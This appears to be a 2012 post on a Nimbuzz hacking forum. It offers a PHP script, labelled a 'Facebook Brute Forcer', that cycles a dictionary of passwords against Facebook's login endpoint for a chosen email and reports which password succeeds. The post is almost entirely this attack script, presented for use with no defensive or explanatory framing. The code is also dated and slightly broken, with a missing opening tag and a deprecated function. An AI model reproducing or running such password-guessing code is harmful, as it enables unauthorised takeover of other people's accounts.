+nimbuzz, +nimbuzz tricks, +nimbuzz web flood
 
HomeCalendarFAQSearchMemberlistUsergroupsRegisterLog in


1.do not abuse anyone or personal comment to anyone. 2.do not promote your website or forum on this forum.. 3.dont post illegal contents on this forum. 4.do not repeat the posts. thnx regards, team nimbuzz-india
Share | .
 

 NEW FACEBOOK BRUTEFORCE

View previous topic View next topic Go down 
AuthorMessage
Admin
Admin


Posts: 115
Join date: 2011-04-25

PostSubject: NEW FACEBOOK BRUTEFORCE   Fri Feb 03, 2012 12:14 am

###############################
# Face Book Brute Forcer
################################
#Miracle-Ubers.org
################################
set_time_limit(0);
$username ="brute@force.org"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list

function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home</title>",$source)){return true;} else {return false;}

}

if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - P
assword found : $line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found :
$line</font><br>";}
}
?>
Back to top Go down
View user profile http://nimbuzz.forummotion.com
 

NEW FACEBOOK BRUTEFORCE

View previous topic View next topic Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
 :: Nimbuzz-Ind :: MEMBERS ARENA-